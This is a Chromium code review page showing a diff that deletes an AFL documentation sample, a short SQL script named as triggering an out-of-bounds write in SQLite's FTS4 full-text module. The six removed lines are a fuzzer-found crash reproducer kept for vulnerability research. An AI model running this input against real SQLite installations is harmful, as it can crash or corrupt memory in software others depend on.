Chromium Code Reviews
chromiumcodereview-hr@appspot.gserviceaccount.com (chromiumcodereview-hr) | Please choose your nickname with Settings | Help | Chromium Project | Gerrit Changes | Sign out
(1064)

Unified Diff: third_party/afl/src/docs/vuln_samples/sqlite-oob-write.sql

Issue 2662883002: Roll AFL 2.31b:2.38b and switch coverage to use trace-pc-guard. (Closed)
Patch Set: Remove unneeded vuln_samples binaries. Created 3 years, 11 months ago
Use n/p to move between diff chunks; N/P to move between comments. Draft comments are only viewable by you.
Jump to:
View side-by-side diff with in-line comments
Download patch
Index: third_party/afl/src/docs/vuln_samples/sqlite-oob-write.sql
diff --git a/third_party/afl/src/docs/vuln_samples/sqlite-oob-write.sql b/third_party/afl/src/docs/vuln_samples/sqlite-oob-write.sql
deleted file mode 100644
index 9b2c427d5e37f483ec1a1279e2a099b310c205c7..0000000000000000000000000000000000000000
--- a/third_party/afl/src/docs/vuln_samples/sqlite-oob-write.sql
+++ /dev/null
@@ -1,6 +0,0 @@
-CREATE VIRTUAL TABLE t0 USING fts4(x,order=DESC);
-INSERT INTO t0(docid,x)VALUES(-1E0,'0(o');
-INSERT INTO t0 VALUES('');
-INSERT INTO t0 VALUES('');
-INSeRT INTO t0 VALUES('o');
-SELECT docid FROM t0 WHERE t0 MATCH'"0*o"';

Powered by Google App Engine
This is Rietveld 408576698